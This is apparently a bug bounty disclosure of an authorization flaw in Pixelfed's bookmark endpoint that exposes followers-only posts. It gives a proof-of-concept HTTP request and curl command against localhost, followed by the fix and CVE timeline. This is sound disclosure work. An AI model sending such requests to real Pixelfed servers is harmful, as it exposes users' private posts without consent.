An attacker can view private posts in pixelfed/pixelfed


Reported on

Jan 18th 2023


The bookmark saving functionality performs improper authorization check.

To exploit this, an attacker is required to know the target post ID. This is done via share link or by (less possibly) brute-forcing.

Proof of Concept

  1. [victim] Create a new post whose visibility is Followers Only. In this case the post ID is 521204147650984455.
  2. [attacker] Send the following request:
POST /i/bookmark HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 27
Referer: http://localhost/i/web/post/521154091471578587
X-Requested-With: XMLHttpRequest


Equivalent command:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Content-Type: application/json' -H $'Content-Length: 27' -H $'Referer: http://localhost/i/web/post/521154091471578587' -H $'X-Requested-With: XMLHttpRequest' -H $'X-CSRF-TOKEN: 5DyUM2DySl5UvQmaCgxNTxjLz9G1MlCFCqmZTclf' \
    --data-binary $'{\"item\":521204147650984455}' \
  1. [attacker] Go to my bookmarks and see there is the post created on step. 1.


An attacker can view private posts.

We are processing your report and will contact the pixelfed team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
We have contacted a member of the pixelfed team and are waiting to hear back a year ago
pixelfed/pixelfed maintainer validated this vulnerability a year ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pixelfed/pixelfed maintainer marked this as fixed in 0.11.4 with commit ef56f9 a year ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 19th 2023
pixelfed/pixelfed maintainer published this vulnerability 10 months ago
to join this conversation